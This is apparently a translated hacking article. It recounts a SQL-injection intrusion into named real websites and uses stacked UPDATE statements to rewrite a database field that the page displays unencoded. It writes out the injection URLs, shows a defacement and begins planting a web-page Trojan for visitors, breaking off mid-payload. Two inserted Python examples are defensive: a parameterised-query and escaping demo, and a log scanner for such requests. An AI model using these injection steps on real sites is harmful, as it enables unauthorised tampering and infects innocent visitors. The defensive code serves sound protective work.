Hijacking the database to carry out a cross-site attack

xiaoxiao2021-03-05  22

We all know that a so-called cross-site attack comes from user input that is not fully filtered: when a visitor browses the page, the malicious script that was entered gets executed. The inserted script may be JavaScript that steals cookie information, or more often web-page Trojan code that exploits IE vulnerabilities. This kind of attack is easy to carry out once you have a WEBSHELL and can insert the Trojan code. Of course, this method has its shortcomings, which I'll discuss here. First, the prerequisite for a cross-site attack: there has to be a place where input is not strictly checked. On some large websites with little user interaction, this kind of input is generally well filtered, so on the surface it looks quite tricky. But consider this: if the website has a SQL injection point, the result is different. The database I'm talking about here is MSSQL (the idea also works for other databases, but they are harder to handle). It needs a SQL injection vulnerability, but it does not need administrator privileges; UPDATE privilege is enough, and the ordinary DB_OWNER role has that permission. We directly modify the information in the database, so that when the ASP program reads the database, the modified web-page Trojan code is displayed on the page. Let me show the attack process with an example. While browsing the Taiwan Orange (Gamania) site:

http://www.gamania.com
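The paragraph above describes the whole mechanism: a parameter is concatenated into a SQL string, the injected statement rewrites a table the page later reads from, and the page echoes the field without encoding, so every later visitor runs the script. The following is an added example, not code from the article: it emulates that ASP pattern in Python with an in-memory SQLite stand-in (the table name `RunText` and column `runtext` come from the article; the schema, the `sid` lookup, and the `<marquee>` rendering are assumptions), and puts the two fixes a defender needs side by side: a parameterised query, and HTML output encoding so that a field that was already tampered with still renders as harmless text.

```python
import html
import sqlite3

# Constructed stand-in for the article's MSSQL table (schema is assumed).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE RunText (sid TEXT PRIMARY KEY, runtext TEXT)")
    conn.execute("INSERT INTO RunText VALUES ('h00050', 'Welcome to the fortune page')")
    conn.commit()
    return conn

def run_batch(conn, sql):
    """Emulate a driver that executes every statement in the batch, as MSSQL does
    by default (sqlite3.execute() refuses stacked statements). Returns the rows
    of the first statement, which is what the page then renders."""
    rows, buf = None, ""
    for ch in sql:
        buf += ch
        if ch == ";" and sqlite3.complete_statement(buf):
            cur = conn.execute(buf)
            if rows is None:
                rows = cur.fetchall()
            buf = ""
    if buf.strip():
        cur = conn.execute(buf)
        if rows is None:
            rows = cur.fetchall()
    return rows

def page_vulnerable(conn, sid):
    # ASP-style concatenation: the sid parameter lands inside the SQL text,
    # so a stacked UPDATE in it is executed with the web account's privileges.
    rows = run_batch(conn, "SELECT runtext FROM RunText WHERE sid='" + sid + "'")
    text = rows[0][0] if rows else ""
    return "<marquee>" + text + "</marquee>"          # raw field, no encoding

def page_hardened(conn, sid):
    # Parameterised query: sid is bound as data and never parsed as SQL.
    row = conn.execute("SELECT runtext FROM RunText WHERE sid=?", (sid,)).fetchone()
    text = row[0] if row else ""
    # Output encoding: even a tampered field is shown as text, not executed.
    return "<marquee>" + html.escape(text) + "</marquee>"

# Constructed payload shaped like the article's: close the string, stack an UPDATE.
PAYLOAD = ("h00050'; UPDATE RunText SET runtext='<script>alert(1)</script>' "
           "WHERE sid='h00050")

def demo():
    """Returns what each page variant renders after one poisoned request."""
    tampered = make_db()
    page_vulnerable(tampered, PAYLOAD)                 # the stacked UPDATE runs here
    result = {
        "vulnerable_after": page_vulnerable(tampered, "h00050"),   # script served raw
        "encoded_after": page_hardened(tampered, "h00050"),        # same row, escaped
    }
    clean = make_db()
    result["hardened_request"] = page_hardened(clean, PAYLOAD)     # no row, no UPDATE
    result["clean_row"] = clean.execute("SELECT runtext FROM RunText").fetchone()[0]
    return result

if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "=>", v)
```

Beyond the two code fixes, the article's own observation that UPDATE is enough points at a third control: the account an ASP page reads with should not hold DB_OWNER or UPDATE on tables the page only ever reads.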

At the time, I found this injection point:

Http://fateasia.gamania.com/turtle/index.asp?sid=e00001

I was surprised that a site like this could also be injected, so, trusting my luck, I took out the familiar tool NBSI and ran it, and guessed out the following information:

The permission level is DB_OWNER. The first method for getting a WEBSHELL is through DB_OWNER's backup privilege. However, I have tried it on many websites, especially large ones whose databases are quite huge, and the success rate of this method is not high (at least I have never succeeded once; after all, my skills are limited, heh). Let's try again anyway: first get the physical path of the web root through the registry approach:

The specific method has been covered in earlier issues, so I won't repeat it here. Of course, after getting the path, back up the WEBSHELL.

Since I haven't seen how CYF's tool decides between INT and character data types, it added a ' to the parameter in the URL and treated the injection as integer data. Let's look at the result:

Failure. It seems a routine attack won't bring any new breakthrough, so let's try another approach.

Later, I looked at this divination web page and saw the following information:

Oh, it turned out to be a partner site of

Www.fatesia.com

First ping the two sites:

As expected, they are on the same server. Let's look at this site:

Well, let's do it. This website is also quite big, heh; don't think I wouldn't dare to mess with you. There is another area on the site, and it also has an injection point, but unfortunately this station's database and

Http://fateasia.gamania.com

share the same database:

It seems that this is the main station:

Let's take a look at our backed-up Trojan on this station:

Http://www.fateasia.com/asp.asp Return 404

Error. It seems that doesn't work either. Depressing.

At this point it suddenly occurred to me: since I can't get a WebShell, can we plant a web-page Trojan or cross-site attack script without a shell? Because we have update permission on this site's database, this is theoretically feasible. Exciting. Yes, directly manipulating the database for a cross-site attack is indeed a method with a particularly wide range of application. Some people spend a lot of effort getting a SHELL just to plant a Trojan, and that time is expensive. This is just my idea; let's see whether it can succeed.

First, you have to find a place where the ASP page reads from the database; generally, content that changes dynamically is read from the database.

We chose the most obvious place (the specific choice depends on your experience: places that are updated frequently usually read their information from the database), as follows:

The scrolling red text in this place should be read from the database.

View the source code:

I need to look at the characters, and everyone should be able to see them. Because this is a Traditional Chinese database, I pasted the selected text into a local web file, opened it, and chose Traditional Chinese encoding, which gave the following information:

OK, we look for this text in the database. Because the database is quite large, I had to spend a lot of time searching.

Hard work pays off; finally I found the information in the database:

Although it looks garbled in NBSI, viewing this text in IE gives:

Oh, it looks like what is displayed on the page; it seems to be this place. To confirm, I updated the content of this field using the following command:

http://www.fateasia.com/fate.asp?sid=h00050'; update runtext set runtext = 'acid by llikz (http://www.hacker.com.cn)';

Refresh the web page:

See, we have successfully updated the information in its database. So a simple statement changes this website's home page; it really gives a sense of accomplishment. Next we try to put malicious code into the database. I chose a web-page Trojan:

Http://www.fateasia.com/fate.asp?sid=h00050';update RunText set runtext = 'test !!
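The two requests above leave a very recognisable trace in the web server log: a quote that closes the string, a semicolon, and a data-modifying statement inside a GET query string. The following is an added example, not part of the article: a small scanner over constructed IIS W3C-style log lines (the field layout and the sample entries are assumptions) that URL-decodes each query string and flags stacked UPDATE/INSERT/DELETE/EXEC statements, so that a defender reviewing logs for a read-only page can spot this kind of tampering.

```python
import re
from urllib.parse import unquote_plus

# A quote (or URL-encoded quote, already decoded here) followed by a statement
# separator and a data-modifying or procedure-executing keyword.
STACKED_DML = re.compile(r"'\s*;\s*(update|insert|delete|exec(?:ute)?|drop)\b",
                         re.IGNORECASE)

def parse_w3c_line(line):
    """Split one constructed IIS W3C log line: date time method uri query status."""
    parts = line.split()
    if len(parts) < 6 or parts[0].startswith("#"):
        return None
    date, time, method, uri, query, status = parts[:6]
    return {"when": f"{date} {time}", "method": method, "uri": uri,
            "query": "" if query == "-" else unquote_plus(query), "status": status}

def find_stacked_injection(lines):
    """Return (timestamp, uri, keyword) for every request whose decoded query
    string carries a stacked data-modifying statement."""
    hits = []
    for line in lines:
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        m = STACKED_DML.search(rec["query"])
        if m:
            hits.append((rec["when"], rec["uri"], m.group(1).lower()))
    return hits

# Constructed sample log; the two poisoned entries are shaped like the article's
# requests, the rest are ordinary traffic to the same page.
SAMPLE_LOG = [
    "#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status",
    "2005-01-10 09:12:01 GET /fate.asp sid=h00050 200",
    "2005-01-10 09:12:44 GET /fate.asp sid=h00050';+update+runtext+set+runtext='acid' 200",
    "2005-01-10 09:13:02 GET /fate.asp sid=h00051 200",
    "2005-01-10 09:15:30 GET /fate.asp sid=h00050%27%3Bupdate+RunText+set+runtext%3D%27test%27 200",
    "2005-01-10 09:16:10 GET /index.asp - 200",
]

if __name__ == "__main__":
    for hit in find_stacked_injection(SAMPLE_LOG):
        print("stacked %s in %s at %s" % (hit[2], hit[1], hit[0]))
```

The regex is deliberately narrow (it keys on the quote-semicolon-keyword shape the article uses) so it can run over large logs with few false positives; a broader WAF-style rule set would also catch comment sequences and encoded variants, but for confirming whether a page's table was rewritten through its own query string, this shape is the one to look for first.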